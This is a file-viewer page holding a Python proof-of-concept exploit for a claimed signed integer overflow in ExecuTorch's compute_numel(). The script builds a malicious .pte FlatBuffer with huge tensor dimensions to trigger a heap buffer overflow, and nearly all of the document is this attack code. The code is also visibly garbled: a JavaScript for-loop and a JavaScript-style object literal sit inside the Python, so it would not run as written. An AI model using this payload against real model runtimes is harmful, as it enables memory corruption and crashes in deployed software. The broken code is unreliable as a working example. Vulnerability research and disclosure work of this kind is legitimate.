File size: 3,731 Bytes
b0034d7
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/env python3
"""PoC: compute_numel() signed integer overflow in Meta ExecuTorch
Generates a malicious .pte file that triggers heap buffer overflow.
Run: pip install flatbuffers && python3 poc_compute_numel_overflow.py
"""
import flatbuffers

FILE_IDENTIFIER = b"ET12"

def build_malicious_pte(output_path, sizes):
    builder = flatbuffers.Builder(4096)
    num_dims = len(sizes)
    builder.StartVector(4, num_dims, 4)
    for s in reversed(sizes):
        builder.PrependInt32(s)
    sizes_vec = builder.EndVector()
    builder.StartVector(1, num_dims, 1)
    for i in reversed(range(num_dims)):
        builder.PrependUint8(i)
    dim_order_vec = builder.EndVector()
    builder.StartObject(10)
    builder.PrependInt8Slot(0, 6, 0)
    builder.PrependInt32Slot(1, 0, 0)
    builder.PrependUOffsetTRelativeSlot(2, sizes_vec, 0)
    builder.PrependUOffsetTRelativeSlot(3, dim_order_vec, 0)
    builder.PrependBoolSlot(4, False, 0)
    builder.PrependUint32Slot(5, 1, 0)
    builder.PrependInt8Slot(7, 0, 0)
    builder.PrependInt8Slot(8, 0, 0)
    tensor = builder.EndObject()
    builder.StartObject(2)
    builder.PrependUint8Slot(0, 5, 0)
    builder.PrependUOffsetTRelativeSlot(1, tensor, 0)
    evalue = builder.EndObject()
    builder.StartVector(4, 1, 4)
    builder.PrependUOffsetTRelative(evalue)
    values_vec = builder.EndVector()
    builder.StartVector(4, 1, 4)
    builder.PrependInt32(0)
    inputs = builder.EndVector()
    builder.StartVector(4, 1, 4)
    builder.PrependInt32(0)
    outputs = builder.EndVector()
    builder.StartVector(8, 2, 8)
    builder.PrependInt64(0)
    builder.PrependInt64(0)
    ncsizes = builder.EndVector()
    name = builder.CreateString("forward")
    builder.StartObject(9)
    builder.PrependUOffsetTRelativeSlot(0, name, 0)
    builder.PrependUOffsetTRelativeSlot(2, values_vec, 0)
    builder.PrependUOffsetTRelativeSlot(3, inputs, 0)
    builder.PrependUOffsetTRelativeSlot(4, outputs, 0)
    builder.PrependUOffsetTRelativeSlot(8, ncsizes, 0)
    ep = builder.EndObject()
    builder.StartVector(4, 1, 4)
    builder.PrependUOffsetTRelative(ep)
    ep_vec = builder.EndVector()
    builder.StartVector(1, 0, 1)
    es = builder.EndVector()
    builder.StartObject(1)
    builder.PrependUOffsetTRelativeSlot(0, es, 0)
    b0 = builder.EndObject()
    builder.StartVector(1, 16, 16)
    for (let j = 0; j < 16; j++) builder.PrependUint8(0x41);
    ds = builder.EndVector()
    builder.StartObject(1)
    builder.PrependUOffsetTRelativeSlot(0, ds, 0)
    b1 = builder.EndObject()
    builder.StartVector(4, 2, 4)
    builder.PrependUOffsetTRelative(b1)
    builder.PrependUOffsetTRelative(b0)
    cb = builder.EndVector()
    builder.StartObject(2)
    builder.PrependUint32Slot(0, 0, 0)
    cs = builder.EndObject()
    builder.StartObject(8)
    builder.PrependUint32Slot(0, 0, 0)
    builder.PrependUOffsetTRelativeSlot(1, ep_vec, 0)
    builder.PrependUOffsetTRelativeSlot(2, cb, 0)
    builder.PrependUOffsetTRelativeSlot(5, cs, 0)
    prog = builder.EndObject()
    builder.Finish(prog, {fileIdentifier: FILE_IDENTIFIER})
    buf = bytes(builder.Output())
    with open(output_path, "wb") as f:
        f.write(buf)
    return buf

if __name__ == "__main__":
    sizes = [2147483647, 2147483647, 4]
    true_product = 1
    for s in sizes:
        true_product *= s
    print(f"Tensor sizes: {sizes}")
    print(f"True numel: {true_product:,}")
    print(f"INT64_MAX:   {(1 << 63) - 1:,}")
    print(f"Overflow:    {true_product > (1 << 63) - 1}")
    buf = build_malicious_pte("malicious_overflow.pte", sizes)
    print(f"Generated malicious_overflow.pte ({len(buf)} bytes)")
    assert buf[4:8] == FILE_IDENTIFIER
    print("Valid ET12 FlatBuffer confirmed")